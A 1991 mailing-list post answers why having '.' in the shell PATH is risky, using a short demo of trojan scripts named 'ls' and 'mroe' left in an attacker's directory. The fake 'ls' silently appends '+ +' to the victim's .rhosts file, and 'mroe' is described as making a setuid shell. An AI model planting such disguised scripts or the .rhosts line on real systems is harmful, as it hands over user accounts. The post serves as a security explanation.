Dot in PATH?
Paul Falstad
pfalstad at tan.Princeton.EDU
Fri Jan 25 08:54:06 AEST 1991
[ Is this in the FAQ? I forget... ]
jeffb at aquifer.las.uiuc.edu (Jeffrey Biesiadecki) wrote:
>In a recent flame war in alt.sources, it was said that it was a bad idea
>to have '.' in your $PATH variable (I use tcsh, or csh, probably this
>would apply for any shell). What's wrong with doing this?
Let's say you have . first (VERY stupid).
% whoami
joeuser
% cd ~hacker/pub/funny
% ls
games jokes
% logout
joeuser's account has just been broken into. Where did it happen?
Let's say you have . last.
% cd ~hacker/pub/funny
% mroe jokes
mroe: Command not found.
% more jokes
Why did the chicken cross the road?
To get to the other side.
% logout
Happened again here. Here's how:
% ls
games jokes
% /bin/ls
games jokes l ls ls-l moer more mroe sl
% cat ./ls
#! /bin/csh -f
/bin/ls games jokes
echo + + >>~/.rhosts
% cat ./mroe
#! /bin/sh
... make suid shell of joeuser ...
case $SHELL in
*csh) echo mroe: Command not found. ;;
*) mroe: not found ;;
esac
%
Get the idea?
--
Paul Falstad, pfalstad at phoenix.princeton.edu PLink:HYPNOS GEnie:P.FALSTAD
"And she's always on about men following her. I don't know what she
thinks they're going to do to her. Vomit on her, Basil, says."-Flowery Twats
More information about the Comp.unix.shell
mailing list